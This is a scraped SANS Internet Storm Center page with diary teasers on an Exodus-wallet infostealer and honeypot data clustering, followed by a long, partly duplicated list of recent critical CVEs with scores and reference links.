SEC595: Applied Data Science and AI/Machine Learning for Cybersecurity Professionals

Experience SANS training through course previews.
Learn MoreLet us help.
Contact usBecome a member for instant access to our free resources.
Sign UpWe're here to help.
Contact UsISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html
Python Infostealer Patching Windows Exodus App
Published: 2024-09-18.
Last Updated: 2024-09-18 07:43:00 UTC
by Xavier Mertens (Version: 1)
A few months ago, I wrote a diary[1] about a Python script that replaced the Exodus[2] Wallet app with a rogue one on macOS. Infostealers are everywhere these days. They target mainly browsers (cookies, credentials) and classic applications that may handle sensitive information. Cryptocurrency wallets are another category of applications that are juicy for attackers. I spotted again an interesting malware that mimics an Exodus wallet by displaying a small GUI ...
https://isc.sans.edu/diary/Python+Infostealer+Patching+Windows+Exodus+App/31276/
Finding Honeypot Data Clusters Using DBSCAN: Part 2
Published: 2024-09-13.
Last Updated: 2024-09-13 14:45:14 UTC
by Jesse La Grew (Version: 1)
In an earlier diary, I reviewed how using tools like DBSCAN can be useful to group similar data. I used DBSCAN to try and group similar commands submitted to Cowrie and URL paths submitted to the DShield web honeypot. DBSCAN was very helpful to group similar commands, but it was also very useful when trying to determine whether commands from one honeypot were seen in another. How much overlap in attack data is there between honeypots? Is there any targeting based on the hosting location of the honeypot?
Once the data is separated into clusters and the appropriate EPS and Minsample values are selected, comparing the data in a table can help highlight differences ...
https://isc.sans.edu/diary/Finding+Honeypot+Data+Clusters+Using+DBSCAN+Part+2/31194/
Hygiene, Hygiene, Hygiene! [Guest Diary]
Published: 2024-09-11.
Last Updated: 2024-09-12 22:38:15 UTC
by Guy Bruneau (Version: 1)
[This is a Guest Diary by Paul Olson, an ISC intern as part of the SANS.edu BACS program]
Introduction
Starting my internship with SANS Internet Storm Center was daunting from the aspect of being unsure of what to expect. Over the years I’ve completed several SANS courses and have become comfortable with that experience; there is a flow to the courses and the SANS instructors exceed my expectations. In this respect, the ISC Internship is a completely different animal; it presents a more hands-on learning opportunity, requires more self-reliance, and provides a greater element of unpredictability than I have found in SANS course labs. With more of the Internship work behind me than in front of me I can say that I have gotten more out of this internship than I have from other similar experiences.
Some of my concerns were about the ‘unknown unknowns’. Setting up the DShield honeypot [3] was straightforward exercise; my biggest worry was meeting the objectives of the Internship. Over the years that I have had broadband Internet I have periodically reviewed the logs generated by my home firewall. The firewall logs didn’t provide a wealth of information (event time, source and destination IP, protocol and ports involved, etc.). My concern became “How am I going to produce seven attack observation reports out of this? Who is going to bother with this device connected in a basement to a broadband network in North Dakota, US?”.
As it turns out that wasn’t going to be an issue. This newly-minted honeypot was remotely interacted with over 1,600 times from 169 distinct IP addresses on the first day; the device currently averages 17,000 probes daily. Reviewing the honeypot logs, one of the first lessons I learned from the Internship is that there are vast differences between a single-dimension firewall log and the level of detail in the data the honeypot captures when it is probed.
https://isc.sans.edu/diary/Hygiene+Hygiene+Hygiene+Guest+Diary/31260/
23:59, Time to Exfiltrate! (2024.09.17)
https://isc.sans.edu/diary/2359+Time+to+Exfiltrate/31272/
Managing PE Files With Overlays (2024.09.16)
https://isc.sans.edu/diary/Managing+PE+Files+With+Overlays/31268/
YARA-X's Dump Command (2024.09.15)
https://isc.sans.edu/diary/YARAXs+Dump+Command/31264/
YARA 4.5.2 Release (2024.09.14)
https://isc.sans.edu/diary/YARA+452+Release/31258/
Python Libraries Used for Malicious Purposes (2024.09.11)
https://isc.sans.edu/diary/Python+Libraries+Used+for+Malicious+Purposes/31248/
The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.
Product: Microsoft Windows 10 1507
CVSS Score: 8.8
** KEV since 2024-09-16 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43461
ISC Podcast: https://isc.sans.edu/podcastdetail/9140
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43461
Product: Microsoft Windows 10 1507
CVSS Score: 9.8
** KEV since 2024-09-10 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43491
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43491
Product: Ivanti Cloud Services Appliance
CVSS Score: 7.2
** KEV since 2024-09-13 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8190
ISC Podcast: https://isc.sans.edu/podcastdetail/9138
NVD References: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190
Product: Ivanti Endpoint Manager
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-29847
ISC Podcast: https://isc.sans.edu/podcastdetail/9138
NVD References: https://forums.ivanti.com/s/article/Security-Advisory-EPM-September-2024-for-EPM-2024-and-EPM-2022
Product: Ivanti Endpoint Manager
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8191
NVD References: https://forums.ivanti.com/s/article/Security-Advisory-EPM-September-2024-for-EPM-2024-and-EPM-2022
Product: Microsoft Windows 10 1507
CVSS Score: 7.8
** KEV since 2024-09-10 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38014
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38014
Product: Microsoft Office
CVSS Score: 7.3
** KEV since 2024-09-10 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38226
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38226
Product: Microsoft Windows 10 1507
CVSS Score: 5.4
** KEV since 2024-09-10 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38217
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38217
Product: Microsoft Windows
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-6596
NVD References: https://cert.vde.com/en/advisories/VDE-2024-041
Product: Siemens Totally Integrated Automation Portal (TIA Portal)
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-33698
NVD References: https://cert-portal.siemens.com/productcert/html/ssa-039007.html
Product: Siemens SIMATIC WinCC V7.5 (All versions < V7.5 SP2 Update 18)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-35783
NVD References: https://cert-portal.siemens.com/productcert/html/ssa-629254.html
Product: Siemens Industrial Edge Management
CVSS Score: 10.0 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45032
NVD References: https://cert-portal.siemens.com/productcert/html/ssa-359713.html
Product: Samsung Escargot
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-40754
NVD References: https://github.com/Samsung/escargot/pull/1369
Product: Loftware Spectrum
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-37226
NVD References:
- https://code-white.com/public-vulnerability-list/
- https://docs.loftware.com/spectrum-releasenotes/Content/Hotfix/4.6_HF14.htm
Product: Loftware Spectrum
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-37227
NVD References:
- https://code-white.com/public-vulnerability-list/
- https://docs.loftware.com/spectrum-releasenotes/Content/Hotfix/4.6_HF13.htm
Product: Loftware Spectrum
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-37231
NVD References:
- https://code-white.com/public-vulnerability-list/
- https://docs.loftware.com/spectrum-releasenotes/Content/Hotfix/4.6_HF14.htm
Product: Aladdin
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44677
NVD References:
- https://github.com/elunez/eladmin
- https://github.com/jcxj/jcxj/blob/master/source/_posts/eladmin-%E5%A4%8D%E7%8E%B0.md
Product: Nix
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45593
NVD References:
- https://github.com/NixOS/nix/commit/eb11c1499876cd4c9c188cbda5b1003b36ce2e59
- https://github.com/NixOS/nix/security/advisories/GHSA-h4vv-h3jq-v493
Product: Microsoft Azure Web Apps
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38194
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38194
Product: Microsoft Azure Stack Hub
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38216
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38220
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38216
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38220
Product: Microsoft Dynamics 365 Business Central
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38225
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38225
Product: Microsoft Windows 10 1507
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38240
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38240
Product: Microsoft Windows Server 2008
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43455
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43455
Product: JimuSoftware JimuReport
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44893
NVD References: https://github.com/jeecgboot/JimuReport/issues/2904
Product: Ruby-SAML
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45409
NVD References:
- https://github.com/SAML-Toolkits/ruby-saml/commit/1ec5392bc506fe43a02dbb66b68741051c5ffeae
- https://github.com/SAML-Toolkits/ruby-saml/commit/4865d030cae9705ee5cdb12415c654c634093ae7
- https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
- https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-cvp8-5r8g-fhvq
Product: Renwoxing Enterprise Intelligent Management System
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43040
NVD References: https://gist.github.com/X1lyS/75a8ea48c4997b683e8b41c94e79e5f9
Product: VICIdial
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8503
NVD References:
- https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt
Product: WordPress video carousel slider with lightbox plugin
Active Installations: 1,000+
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2019-25212
NVD References:
- https://wordpress.org/plugins/wp-responsive-video-gallery-with-lightbox
Product: WooCommerce Photo Reviews Premium (plugin)
Active Installations: 20,000+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8277
NVD References:
- https://codecanyon.net/item/woocommerce-photo-reviews/21245349
Product: SO Planning online planning tool
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-27114
NVD References: https://csirt.divd.nl/CVE-2024-27114
Product: Comfast CF-XR11
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44466
NVD References: https://github.com/CurryRaid/iot_vul/tree/main/comfast
Product: evilnapsis Inventio Lite
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44541
NVD References:
Product: Solarwinds Access Rights Manager
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-28990
NVD References:
- https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-28990
Product: No-IP Dynamic Update Client (DUC)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-40457
NVD References:
- https://www.noip.com/support/knowledgebase/install-linux-3-x-dynamic-update-client-duc
- https://www.noip.com/support/knowledgebase/running-linux-duc-v3-0-startup-2
Product: Nozomi Networks SCADAguardian
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45824
NVD References: https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1696.html
Product: GitLab-EE
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-2743
NVD References:
Product: GitLab CE/EE
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-6678
NVD References:
Product: Docker Desktop
CVSS Score: 9.8 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8695
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8696
NVD References: https://docs.docker.com/desktop/release-notes/#4342
Product: ORDAT FOSS-Online
CVSS Score: 9.3 NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-34334
NVD References:
- https://mind-bytes.de/sql-injection-in-foss-online-cve-2024-34334/
Product: Adobe ColdFusion 2021
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-41874
NVD References: https://helpx.adobe.com/security/products/coldfusion/apsb24-71.html
Product: Best Free Law Office Management Software
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44430
NVD References:
- https://blog.csdn.net/samwbs/article/details/140954482
- https://github.com/samwbs/kortexcve/blob/main/xss_register_case/XSS_register_case.md
Product: AFMobi Boomplayer
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8039
NVD References:
Product: The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress
Active Installations: 200,000+
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8669
NVD References:
- https://plugins.trac.wordpress.org/browser/backuply/trunk/functions.php#L1477
Product: Code-Projects Crud Operation System
CVSS Score: 9.8
NVD:
- https://nvd.nist.gov/vuln/detail/CVE-2024-8762
- https://github.com/Kangsiyuan/1/issues/1
CVE-2024-8868 - Code-projects Crud Operation System 1.0 is vulnerable to a critical sql injection issue in the file savedata.php through the argument sname.
Product: Code-Projects Crud Operation System
CVSS Score: 9.8
NVD:
- https://nvd.nist.gov/vuln/detail/CVE-2024-8868
- https://github.com/ppp-src/a/issues/7
CVE-2024-46918 - MISP allows org admins to view sensitive login fields of other org admins in the same org before version 2.4.198.
Product: MISP
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46918
NVD References:
- https://github.com/MISP/MISP/commit/3a5227d7b3d4518ac109af61979a00145a0de6fa
- https://github.com/MISP/MISP/compare/v2.4.197...v2.4.198
CVE-2024-46942 - OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL) through 13.0.1 allows a controller with a follower role to configure flow entries in a clustering deployment.
Product: OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46942
NVD References:
- https://docs.opendaylight.org/en/latest/release-notes/projects/mdsal.html
- https://doi.org/10.48550/arXiv.2408.16940
- https://lf-opendaylight.atlassian.net/browse/MDSAL-869
CVE-2024-46943 - OpenDaylight Authentication, Authorization and Accounting (AAA) through 0.19.3 allows a rogue controller to impersonate an offline peer by joining a cluster without possessing complete configuration information.
Product: OpenDaylight Authentication, Authorization and Accounting (AAA)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46943
NVD References:
- https://docs.opendaylight.org/en/latest/release-notes/projects/aaa.html
- https://doi.org/10.48550/arXiv.2408.16940
- https://lf-opendaylight.atlassian.net/browse/AAA-285
CVE-2024-45694 & CVE-2024-45695 - Certain models of D-Link wireless routers are susceptible to Stack-based Buffer Overflow vulnerabilities, enabling unauthenticated remote attackers to execute arbitrary code on the device.
Product: Dlink Dir-X5460 and D-Link Dir-X4860
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45694
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45695
NVD References:
- https://www.twcert.org.tw/en/cp-139-8081-3fb39-2.html
- https://www.twcert.org.tw/tw/cp-132-8080-7f494-1.html
- https://www.twcert.org.tw/en/cp-139-8083-a299e-2.html
- https://www.twcert.org.tw/tw/cp-132-8082-f1687-1.html
CVE-2024-45697 - D-Link wireless routers have a hidden telnet service vulnerability that allows unauthorized remote attackers to execute OS commands using hard-coded credentials.
Product: D-Link wireless routers
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45697
NVD References:
- https://www.twcert.org.tw/en/cp-139-8089-32df6-2.html
- https://www.twcert.org.tw/tw/cp-132-8088-590ed-1.html
CVE-2024-22399 - Apache Seata is vulnerable to deserialization of untrusted data when authentication is disabled on the Seata-Server and the Seata client SDK dependencies are not used, allowing for the construction of malicious requests using bytecode based on the Seata private protocol.
Product: Apache Seata
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-22399
NVD References: https://lists.apache.org/thread/91nzzlxyj4nmks85gbzwkkjtbmnmlkc4
CVE-2024-46451 - TOTOLINK AC1200 T8 v4.1.5cu.861_B20230220 has a buffer overflow vulnerability in the setWiFiAclRules function via the desc parameter.
Product: TOTOLINK T8
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46451
NVD References: https://github.com/offshore0315/loT-vulnerable/blob/main/TOTOLINK/AC1200%20T8/setWiFiAclRules.md
CVE-2024-46419 - TOTOLINK AC1200 T8 v4.1.5cu.861_B20230220 has a buffer overflow vulnerability in the setWizardCfg function via the ssid5g parameter.
Product: TOTOLINK T8
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46419
NVD References: https://github.com/TTTJJJWWW/AHU-IoT-vulnerable/blob/main/TOTOLINK/AC1200T8/setWizardCfg.md
CVE-2024-46937 - MFASOFT Secure Authentication Server (SAS) versions 1.8.x through 1.9.x before 1.9.040924 allows remote attackers to access user tokens without authentication by brute-forcing the serial parameter.
Product: MFASOFT Secure Authentication Server (SAS)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46937
NVD References:
- https://github.com/WI1D-41/IDOR-in-MFASOFT-Secure-Authentication-Server
CVE-2024-45496 - OpenShift is vulnerable to arbitrary command execution due to misuse of elevated privileges in the build process, allowing an attacker to escalate permissions on the worker node.
Product: Red Hat OpenShift
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45496
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-45496
- https://bugzilla.redhat.com/show_bug.cgi?id=2308661
CVE-2024-7387 - Openshift/builder is vulnerable to command injection via path traversal allowing an attacker to execute arbitrary commands on the OpenShift node.
Product: Red Hat Openshift/builder
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-7387
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-7387
- https://bugzilla.redhat.com/show_bug.cgi?id=2302259
CVE-2024-38812 - vCenter Server is vulnerable to a heap-overflow in the DCERPC protocol, allowing remote code execution by a malicious actor via a specially crafted network packet.
Product: VMware vCenter Server
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
NVD References: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
CVE-2024-45798 - Arduino-esp32 is vulnerable to Poisoned Pipeline Execution (PPE) vulnerabilities affecting the `tests_results.yml` workflow and environment Variable injection.
Product: Arduino arduino-esp32
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45798
NVD References:
- https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection
- https://github.com/espressif/arduino-esp32/security/advisories/GHSA-h52q-xhg2-6jw8
- https://securitylab.github.com/research/github-actions-preventing-pwn-requests
- https://securitylab.github.com/research/github-actions-untrusted-input
CVE-2024-8956 - The PTZOptics PT30X-SDI/NDI-xx camera before firmware 6.3.40 is vulnerable to an insufficient authentication issue, allowing a remote attacker to leak sensitive data and manipulate configuration settings without proper authentication.
Product: PTZOptics PT30X-SDI/NDI-xx
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8956
NVD References: https://ptzoptics.com/firmware-changelog/
NVD References: https://vulncheck.com/advisories/ptzoptics-insufficient-auth
CVE-2024-43976 & CVE-2024-43978 - Super Store Finder is vulnerable to SQL Injection due to improper neutralization of special elements in SQL commands, affecting versions from n/a through 6.9.7.
Product: highwarden Super Store Finder
Active Installations: unknown
CVSS Score: 9.3 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43976
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43978
CVE-2024-44004 - WPTaskForce WPCargo Track & Trace allows SQL Injection through improper neutralization of special elements in SQL commands.
Product: WPTaskForce WPCargo Track & Trace
Active Installations: 10,000+
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44004
NVD References: https://patchstack.com/database/vulnerability/wpcargo/wordpress-wpcargo-track-trace-plugin-7-0-6-sql-injection-vulnerability?_s_id=cve
Product: Code-Projects Crud Operation System
CVSS Score: 9.8
NVD:
- https://nvd.nist.gov/vuln/detail/CVE-2024-8868
- https://github.com/ppp-src/a/issues/7
CVE-2024-46918 - MISP allows org admins to view sensitive login fields of other org admins in the same org before version 2.4.198.
Product: MISP
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46918
NVD References:
- https://github.com/MISP/MISP/commit/3a5227d7b3d4518ac109af61979a00145a0de6fa
- https://github.com/MISP/MISP/compare/v2.4.197...v2.4.198
CVE-2024-46942 - OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL) through 13.0.1 allows a controller with a follower role to configure flow entries in a clustering deployment.
Product: OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46942
NVD References:
- https://docs.opendaylight.org/en/latest/release-notes/projects/mdsal.html
- https://doi.org/10.48550/arXiv.2408.16940
- https://lf-opendaylight.atlassian.net/browse/MDSAL-869
CVE-2024-46943 - OpenDaylight Authentication, Authorization and Accounting (AAA) through 0.19.3 allows a rogue controller to impersonate an offline peer by joining a cluster without possessing complete configuration information.
Product: OpenDaylight Authentication, Authorization and Accounting (AAA)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46943
NVD References:
- https://docs.opendaylight.org/en/latest/release-notes/projects/aaa.html
- https://doi.org/10.48550/arXiv.2408.16940
- https://lf-opendaylight.atlassian.net/browse/AAA-285
CVE-2024-45694 & CVE-2024-45695 - Certain models of D-Link wireless routers are susceptible to Stack-based Buffer Overflow vulnerabilities, enabling unauthenticated remote attackers to execute arbitrary code on the device.
Product: Dlink Dir-X5460 and D-Link Dir-X4860
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45694
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45695
NVD References:
- https://www.twcert.org.tw/en/cp-139-8081-3fb39-2.html
- https://www.twcert.org.tw/tw/cp-132-8080-7f494-1.html
- https://www.twcert.org.tw/en/cp-139-8083-a299e-2.html
- https://www.twcert.org.tw/tw/cp-132-8082-f1687-1.html
CVE-2024-45697 - D-Link wireless routers have a hidden telnet service vulnerability that allows unauthorized remote attackers to execute OS commands using hard-coded credentials.
Product: D-Link wireless routers
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45697
NVD References:
- https://www.twcert.org.tw/en/cp-139-8089-32df6-2.html
- https://www.twcert.org.tw/tw/cp-132-8088-590ed-1.html
CVE-2024-22399 - Apache Seata is vulnerable to deserialization of untrusted data when authentication is disabled on the Seata-Server and the Seata client SDK dependencies are not used, allowing for the construction of malicious requests using bytecode based on the Seata private protocol.
Product: Apache Seata
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-22399
NVD References: https://lists.apache.org/thread/91nzzlxyj4nmks85gbzwkkjtbmnmlkc4
CVE-2024-46451 - TOTOLINK AC1200 T8 v4.1.5cu.861_B20230220 has a buffer overflow vulnerability in the setWiFiAclRules function via the desc parameter.
Product: TOTOLINK T8
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46451
NVD References: https://github.com/offshore0315/loT-vulnerable/blob/main/TOTOLINK/AC1200%20T8/setWiFiAclRules.md
CVE-2024-46419 - TOTOLINK AC1200 T8 v4.1.5cu.861_B20230220 has a buffer overflow vulnerability in the setWizardCfg function via the ssid5g parameter.
Product: TOTOLINK T8
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46419
NVD References: https://github.com/TTTJJJWWW/AHU-IoT-vulnerable/blob/main/TOTOLINK/AC1200T8/setWizardCfg.md
CVE-2024-46937 - MFASOFT Secure Authentication Server (SAS) versions 1.8.x through 1.9.x before 1.9.040924 allows remote attackers to access user tokens without authentication by brute-forcing the serial parameter.
Product: MFASOFT Secure Authentication Server (SAS)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46937
NVD References:
- https://github.com/WI1D-41/IDOR-in-MFASOFT-Secure-Authentication-Server
CVE-2024-45496 - OpenShift is vulnerable to arbitrary command execution due to misuse of elevated privileges in the build process, allowing an attacker to escalate permissions on the worker node.
Product: Red Hat OpenShift
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45496
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-45496
- https://bugzilla.redhat.com/show_bug.cgi?id=2308661
CVE-2024-7387 - Openshift/builder is vulnerable to command injection via path traversal allowing an attacker to execute arbitrary commands on the OpenShift node.
Product: Red Hat Openshift/builder
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-7387
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-7387
- https://bugzilla.redhat.com/show_bug.cgi?id=2302259
CVE-2024-38812 - vCenter Server is vulnerable to a heap-overflow in the DCERPC protocol, allowing remote code execution by a malicious actor via a specially crafted network packet.
Product: VMware vCenter Server
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
NVD References: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
CVE-2024-45798 - Arduino-esp32 is vulnerable to Poisoned Pipeline Execution (PPE) vulnerabilities affecting the `tests_results.yml` workflow and environment Variable injection.
Product: Arduino arduino-esp32
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45798
NVD References:
- https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection
- https://github.com/espressif/arduino-esp32/security/advisories/GHSA-h52q-xhg2-6jw8
- https://securitylab.github.com/research/github-actions-preventing-pwn-requests
- https://securitylab.github.com/research/github-actions-untrusted-input
CVE-2024-8956 - The PTZOptics PT30X-SDI/NDI-xx camera before firmware 6.3.40 is vulnerable to an insufficient authentication issue, allowing a remote attacker to leak sensitive data and manipulate configuration settings without proper authentication.
Product: PTZOptics PT30X-SDI/NDI-xx
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8956
NVD References: https://ptzoptics.com/firmware-changelog/
NVD References: https://vulncheck.com/advisories/ptzoptics-insufficient-auth
CVE-2024-43976 & CVE-2024-43978 - Super Store Finder is vulnerable to SQL Injection due to improper neutralization of special elements in SQL commands, affecting versions from n/a through 6.9.7.
Product: highwarden Super Store Finder
Active Installations: unknown
CVSS Score: 9.3 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43976
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43978
CVE-2024-44004 - WPTaskForce WPCargo Track & Trace allows SQL Injection through improper neutralization of special elements in SQL commands.
Product: WPTaskForce WPCargo Track & Trace
Active Installations: 10,000+
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44004
NVD References: https://patchstack.com/database/vulnerability/wpcargo/wordpress-wpcargo-track-trace-plugin-7-0-6-sql-injection-vulnerability?_s_id=cve
Product: MISP
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46918
NVD References:
- https://github.com/MISP/MISP/commit/3a5227d7b3d4518ac109af61979a00145a0de6fa
Product: OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46942
NVD References:
- https://docs.opendaylight.org/en/latest/release-notes/projects/mdsal.html
Product: OpenDaylight Authentication, Authorization and Accounting (AAA)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46943
NVD References:
- https://docs.opendaylight.org/en/latest/release-notes/projects/aaa.html
Product: Dlink Dir-X5460 and D-Link Dir-X4860
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45694
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45695
NVD References:
- https://www.twcert.org.tw/en/cp-139-8081-3fb39-2.html
- https://www.twcert.org.tw/tw/cp-132-8080-7f494-1.html
Product: D-Link wireless routers
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45697
NVD References:
Product: Apache Seata
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-22399
NVD References: https://lists.apache.org/thread/91nzzlxyj4nmks85gbzwkkjtbmnmlkc4
Product: TOTOLINK T8
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46451
NVD References: https://github.com/offshore0315/loT-vulnerable/blob/main/TOTOLINK/AC1200%20T8/setWiFiAclRules.md
Product: TOTOLINK T8
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46419
